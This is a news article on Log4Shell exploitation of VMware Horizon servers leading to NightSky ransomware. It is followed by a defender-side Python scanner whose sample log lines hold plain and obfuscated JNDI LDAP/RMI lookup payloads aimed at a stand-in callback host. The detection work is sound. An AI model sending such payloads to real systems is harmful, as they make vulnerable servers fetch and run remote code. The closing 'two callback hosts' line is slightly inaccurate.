The Log4j vulnerability continues to be exploited by threat actors and a new ransomware group has been identified actively targeting Log4Shell vulnerabilities in VMware Horizon servers. VMware Horizon is a virtual desktop provider which leverages the hybrid cloud.

On 11 January 2022, Microsoft provided an update on Log4j vulnerabilities and noted, “as early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon”. “Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware,” the Microsoft statement said.

The NightSky ransomware was first discovered in December 2021 by MalwareHunterTeam. The attacks are being performed by a China-based ransomware operator that Microsoft says it is tracking as DEV-0401. “DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo and Rook, and has similarly exploited internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).” Based on Microsoft’s analysis, the attackers are using command and control (CnC) servers that spoof legitimate domains.

According to a 5 January 2022 update from the UK’s National Health Service (NHS), the attackers are trying to establish web shells that can be used to carry out the deployment of malicious software, data exfiltration and the deployment of ransomware. The NHS statement says that attackers are leveraging the vulnerability to “use the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service”.

Since being uncovered in early December 2021, threat actors have taken advantage of the opportunities presented by the Log4j vulnerability. According to Check Point Research (CPR), Q4 of 2021 saw an all-time peak in weekly cyber-attacks, with CPR counting more than 900 attacks per organization, largely due to the Log4j vulnerability. Ransomware has been identified as a major issue for those who have not successfully patched the vulnerability. In December, the UK’s National Cyber Security Centre said: “As the situation evolves, we expect attacks to become more targeted.”
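The NHS statement quoted above describes the first step of these intrusions: a JNDI lookup string that makes the vulnerable Log4j instance fetch a Java class over LDAP. As an added defender-side example that is not part of the original article, the following Python scans constructed web-server access-log lines for such lookups, first collapsing the nested ${lower:…} and ${::-…} wrappers that defeat naive string matching, and reports the callback host so it can be blocked and hunted across other logs. The log lines and the 203.0.113.x addresses are constructed for this example.

```python
import re

# Constructed sample access-log lines (not from the page): one benign request and three
# carrying a JNDI lookup in the User-Agent; callbacks use the documentation range 203.0.113.0/24.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [04/Jan/2022:10:12:01 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [04/Jan/2022:10:12:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [04/Jan/2022:10:12:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [04/Jan/2022:10:12:11 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10:1099/x}"',
]

# Innermost ${...} lookup: a body with no nested braces or dollar signs.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A normalised JNDI lookup: the scheme and the host:port the vulnerable server would connect to.
_JNDI = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://([^/}\s]+)", re.IGNORECASE)


def _resolve(match):
    """Evaluate one innermost lookup the way Log4j's string substitution would."""
    body = match.group(1)
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                      # ${name:-default}: the lookup is empty, so the default wins
        return body.split(":-", 1)[1]
    return match.group(0)                 # not an obfuscation wrapper; leave it in place

def normalise_lookups(text, max_rounds=10):
    """Collapse nested obfuscation wrappers until the string stops changing."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text

def find_jndi_lookups(lines):
    """Return (line_number, scheme, callback_host) for every line carrying a JNDI lookup."""
    findings = []
    for n, line in enumerate(lines, start=1):
        for scheme, host in _JNDI.findall(normalise_lookups(line)):
            findings.append((n, scheme.lower(), host))
    return findings

if __name__ == "__main__":
    for n, scheme, host in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {n}: JNDI {scheme} lookup to {host}")
```

Lines 2 to 4 all resolve to the same two callback hosts, which is the value worth pivoting on when checking outbound connections from the Horizon servers.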